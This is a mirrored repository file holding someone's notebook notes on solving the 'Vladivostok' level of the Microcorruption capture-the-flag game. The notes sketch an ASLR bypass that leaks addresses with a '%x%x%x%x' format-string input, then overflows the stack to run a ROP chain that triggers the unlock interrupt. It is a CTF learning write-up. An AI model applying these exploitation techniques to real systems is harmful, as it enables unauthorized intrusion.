j/MicroCorruption
1
0
Fork 0
mirror of https://git.soft.fish/val/MicroCorruption.git synced 2024-11-21 21:05:59 +00:00
Code Issues Packages Projects Releases Wiki Activity
main
MicroCorruption/15-Vladivostok/notes.md

1.4 KiB
Raw Permalink Blame History

Taken verbatim from my notebook

Page 1

Vladivostok     ASLR bypass?
    username[8]: 0x242b
    password[ ]
    aslr_base = r11

    aslr_address = normal - 0x4000 + aslr_base

    Have to call 0x10 directly?
        INT 7f:
            Takes no arguments      (THE LESSON WAS)
            7f passed in SR          (ROP CHAINING)
        All calls to INT wrapped in  (+ASLR BYPASS)
            push/pop SR?
            Neat?

    41414141[r10][r11][ret]
    FUCKING PRINTF?

    Things I have:
        printf(username, ...)
        buffer overflow on stack

    Things I need
        Address on stack?

    Flow: 1. enter "username"
          2. "username" printed
                            <- Create payload
          3. enter "password"
          4. buffer overflow

Page 2

The Hack    (Vladivostok)

    Uname payload: "%x%x%x%x"
        output %printf
    Pword payload: "AAAA(r10)(r11)(pc)[args...]"

    Useful locations:
        +2aa:   pop sr
        +2ac:   add 8, sp
        +2ae:   __check_password

        +56c:   mov.b @sp,   r15;
                sxt   r15       ; pop.b r15
                incd  sp        ;
                ret             ;

        +4f4:   swpb  r15       ;
                mov   r15,   sr ;
                bis   #8000, sr ; INT
                call  0x10      ;
                ...             ;
                ret             ;

    [popb]7f7f[INT]